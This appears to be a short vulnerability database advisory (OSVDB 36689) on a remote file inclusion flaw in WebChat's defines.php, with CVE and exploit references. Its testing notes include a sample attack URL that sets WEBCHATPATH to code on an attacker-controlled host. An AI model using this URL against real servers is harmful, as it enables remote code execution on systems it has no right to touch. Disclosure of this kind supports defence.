WebChat defines.php WEBCHATPATH Variable Remote File Inclusion

2007-01-21T00:00:00
ID OSVDB:36689
Type osvdb
Reporter OSVDB
Modified 2007-01-21T00:00:00

Description

Manual Testing Notes

Http://[victim/[webchat-077_path]/defines.php?WEBCHATPATH=http://[attacker]/[code]?

References:

ISS X-Force ID: 31624 Generic Exploit URL: http://milw0rm.com/exploits/3169 CVE-2007-0485 Bugtraq ID: 22153